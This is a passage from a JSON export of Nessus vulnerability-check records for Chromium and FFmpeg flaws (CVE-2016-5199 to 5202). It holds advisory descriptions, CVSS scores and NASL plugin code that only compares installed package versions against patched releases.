value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-54.0.2840.100-140.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debuginfo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debugsource-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-debuginfo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debuginfo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debugsource-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-54.0.2840.100-91.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-ffmpegsumo-debuginfo-54.0.2840.100-91.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:37", "description": "The version of Google Chrome installed on the remote macOS or Mac OS X host is prior to 54.0.2840.98. It is, therefore, affected by the following vulnerabilities :\n\n - A remote code execution vulnerability exists in the FFmpeg component due to an integer overflow condition in the mov_read_keys() function in mov.c caused by improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to cause a denial of service condition or the execution of arbitrary code. (CVE-2016-5199)\n\n - A denial of service vulnerability exists in the V8 component due to an out-of-bounds read error that is triggered when handling 'Math.sign'. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to crash the browser or disclose memory contents.\n (CVE-2016-5200)\n\n - An information disclosure vulnerability exists due to a flaw in the expose() function in utils.js. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a website containing specially crafted content, to disclose sensitive internal class information. (CVE-2016-5201)\n\n - An unspecified vulnerability exists in the PruneExpiredDevices() function in dial_registry.cc that allows an unauthenticated, remote attacker to have an unspecified impact. (CVE-2016-5202)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-10T00:00:00", "type": "nessus", "title": "Google Chrome < 54.0.2840.98 Multiple Vulnerabilities (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_54_0_2840_98.NASL", "href": "https://www.tenable.com/plugins/nessus/94677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94677);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\n \"CVE-2016-5199\",\n \"CVE-2016-5200\",\n \"CVE-2016-5201\",\n \"CVE-2016-5202\"\n );\n script_bugtraq_id(94196);\n\n script_name(english:\"Google Chrome < 54.0.2840.98 Multiple Vulnerabilities (macOS)\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS or Mac OS X\nhost is prior to 54.0.2840.98. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A remote code execution vulnerability exists in the\n FFmpeg component due to an integer overflow condition in\n the mov_read_keys() function in mov.c caused by improper\n validation of user-supplied input. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a website containing specially crafted content,\n to cause a denial of service condition or the execution\n of arbitrary code. (CVE-2016-5199)\n\n - A denial of service vulnerability exists in the V8\n component due to an out-of-bounds read error that is\n triggered when handling 'Math.sign'. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a website containing specially crafted content,\n to crash the browser or disclose memory contents.\n (CVE-2016-5200)\n\n - An information disclosure vulnerability exists due to a\n flaw in the expose() function in utils.js. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a website containing\n specially crafted content, to disclose sensitive\n internal class information. (CVE-2016-5201)\n\n - An unspecified vulnerability exists in the\n PruneExpiredDevices() function in dial_registry.cc that\n allows an unauthenticated, remote attacker to have an\n unspecified impact. (CVE-2016-5202)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/11/stable-channel-update-for-desktop_9.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bdb7f5cb\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 54.0.2840.98 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-5202\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'54.0.2840.98', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:42", "description": "The remote host is affected by the vulnerability described in GLSA-201611-16 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-23T00:00:00", "type": "nessus", "title": "GLSA-201611-16 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201611-16.NASL", "href": "https://www.tenable.com/plugins/nessus/95267", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201611-16.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95267);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n script_xref(name:\"GLSA\", value:\"201611-16\");\n\n script_name(english:\"GLSA-201611-16 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201611-16\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201611-16\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-54.0.2840.100'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 54.0.2840.100\"), vulnerable:make_list(\"lt 54.0.2840.100\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:38:40", "description": "The version of Google Chrome installed on the remote host is prior to 54.0.2840.99, and is affected by multiple vulnerabilities :\n\n - An integer overflow condition exists in the 'mov_read_keys()' function in 'libavformat/mov.c' that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to cause a heap-based buffer overflow, crashing a process linked against the library or potentially allowing the execution of arbitrary code. (CVE-2016-5199)\n - An out-of-bounds read flaw exists that is triggered when handling 'Math.sign'. This may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents. (CVE-2016-5200)\n - A flaw exists in the 'expose()' function in 'extensions/renderer/resources/utils.js'. This may allow a context-dependent attacker to disclose sensitive internal class information. (CVE-2016-5201)\n - A flaw exist in the 'DialRegistry::PruneExpiredDevices()' function in 'chrome/browser/extensions/api/dial/dial_registry.cc'. This may allow a context-dependent attacker to have an unspecified impact. (CVE-2016-5202)", "cvss3": {"score": null, "vector": null}, "published": "2016-11-18T00:00:00", "type": "nessus", "title": "Google Chrome < 54.0.2840.99 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "9790.PASL", "href": "https://www.tenable.com/plugins/nnm/9790", "sourceData": "Binary data 9790.pasl", "cvss": {"score": 7.8, "vector": "CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2021-08-19T12:39:29", "description": "Google Chrome Releases reports :\n\n4 security fixes in this release, including :\n\n- [643948] High CVE-2016-5199: Heap corruption in FFmpeg. Credit to Paul Mehta\n\n- [658114] High CVE-2016-5200: Out of bounds memory access in V8.\nCredit to Choongwoo Han\n\n- [660678] Medium CVE-2016-5201: Info leak in extensions. Credit to Rob Wu\n\n- [662843] CVE-2016-5202: Various fixes from internal audits, fuzzing and other initiatives", "cvss3": {"score": 9.1, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"}, "published": "2016-11-11T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (a3473f5a-a739-11e6-afaa-e8e0b747a45a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A3473F5AA73911E6AFAAE8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/nessus/94693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94693);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (a3473f5a-a739-11e6-afaa-e8e0b747a45a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n4 security fixes in this release, including :\n\n- [643948] High CVE-2016-5199: Heap corruption in FFmpeg. Credit to\nPaul Mehta\n\n- [658114] High CVE-2016-5200: Out of bounds memory access in V8.\nCredit to Choongwoo Han\n\n- [660678] Medium CVE-2016-5201: Info leak in extensions. Credit to\nRob Wu\n\n- [662843] CVE-2016-5202: Various fixes from internal audits, fuzzing\nand other initiatives\"\n );\n # https://googlechromereleases.blogspot.nl/2016/11/stable-channel-update-for-desktop_9.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?788882ec\"\n );\n # https://vuxml.freebsd.org/freebsd/a3473f5a-a739-11e6-afaa-e8e0b747a45a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cd915349\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<54.0.2840.100\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<54.0.2840.100\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<54.0.2840.100\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:04", "description": "This update to ffmpeg 3.2 fixes the following issues :\n\n - CVE-2016-5199: Heap corruption in FFmpeg (boo#1009892)\n\nFFmpeg was updated to version 3.2, incorporating the following upstream improvements :\n\n - SDL2 output device and ffplay support\n\n - SDL1 output device and SDL1 support removed\n\n - New: libopenmpt demuxer, fifo muxer, True Audio (TTA) muxer\n\n - New filters: weave, gblur, avgblur, sobel, prewitt, vaguedenoiser, yuvtestsrc, lut2, hysteresis, maskedclamp, crystalizer, acrusher, bitplanenoise, sidedata, asidedata\n\n - Non-Local Means (nlmeans) denoising filter\n\n - 16-bit support in curves filter and selectivecolor filter\n\n - Added threads option per filter instance\n\n - The 'curves' filter does not automatically insert points at x=0 and x=1 anymore\n\n - Matroska muxer now writes CRC32 elements by default in all Level 1 elements\n\n - New 'tee' protocol\n\n - VP8 in Ogg muxing\n\n - Floating point support in ALS decoder\n\n - Extended mov edit list support\n\n - Changed mapping of RTP MIME type G726 to codec g726le.\n\nAlso contains a collection of upstream bug fixes.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-11-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ffmpeg (openSUSE-2016-1365)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ffmpeg", "p-cpe:/a:novell:opensuse:ffmpeg-debuginfo", "p-cpe:/a:novell:opensuse:ffmpeg-debugsource", "p-cpe:/a:novell:opensuse:libavcodec-devel", "p-cpe:/a:novell:opensuse:libavcodec57", "p-cpe:/a:novell:opensuse:libavcodec57-32bit", "p-cpe:/a:novell:opensuse:libavcodec57-debuginfo", "p-cpe:/a:novell:opensuse:libavcodec57-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libavdevice-devel", "p-cpe:/a:novell:opensuse:libavdevice57", "p-cpe:/a:novell:opensuse:libavdevice57-32bit", "p-cpe:/a:novell:opensuse:libavdevice57-debuginfo", "p-cpe:/a:novell:opensuse:libavdevice57-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libavfilter-devel", "p-cpe:/a:novell:opensuse:libavfilter6", "p-cpe:/a:novell:opensuse:libavfilter6-32bit", "p-cpe:/a:novell:opensuse:libavfilter6-debuginfo", "p-cpe:/a:novell:opensuse:libavfilter6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libavformat-devel", "p-cpe:/a:novell:opensuse:libavformat57", "p-cpe:/a:novell:opensuse:libavformat57-32bit", "p-cpe:/a:novell:opensuse:libavformat57-debuginfo", "p-cpe:/a:novell:opensuse:libavformat57-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libavresample-devel", "p-cpe:/a:novell:opensuse:libavresample3", "p-cpe:/a:novell:opensuse:libavresample3-32bit", "p-cpe:/a:novell:opensuse:libavresample3-debuginfo", "p-cpe:/a:novell:opensuse:libavresample3-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libavutil-devel", "p-cpe:/a:novell:opensuse:libavutil55", "p-cpe:/a:novell:opensuse:libavutil55-32bit", "p-cpe:/a:novell:opensuse:libavutil55-debuginfo", "p-cpe:/a:novell:opensuse:libavutil55-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libpostproc-devel", "p-cpe:/a:novell:opensuse:libpostproc54", "p-cpe:/a:novell:opensuse:libpostproc54-32bit", "p-cpe:/a:novell:opensuse:libpostproc54-debuginfo", "p-cpe:/a:novell:opensuse:libpostproc54-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libswresample-devel", "p-cpe:/a:novell:opensuse:libswresample2", "p-cpe:/a:novell:opensuse:libswresample2-32bit", "p-cpe:/a:novell:opensuse:libswresample2-debuginfo", "p-cpe:/a:novell:opensuse:libswresample2-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libswscale-devel", "p-cpe:/a:novell:opensuse:libswscale4", "p-cpe:/a:novell:opensuse:libswscale4-32bit", "p-cpe:/a:novell:opensuse:libswscale4-debuginfo", "p-cpe:/a:novell:opensuse:libswscale4-debuginfo-32bit", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2016-1365.NASL", "href": "https://www.tenable.com/plugins/nessus/95377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1365.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95377);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5199\");\n\n script_name(english:\"openSUSE Security Update : ffmpeg (openSUSE-2016-1365)\");\n script_summary(english:\"Check for the openSUSE-2016-1365 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to ffmpeg 3.2 fixes the following issues :\n\n - CVE-2016-5199: Heap corruption in FFmpeg 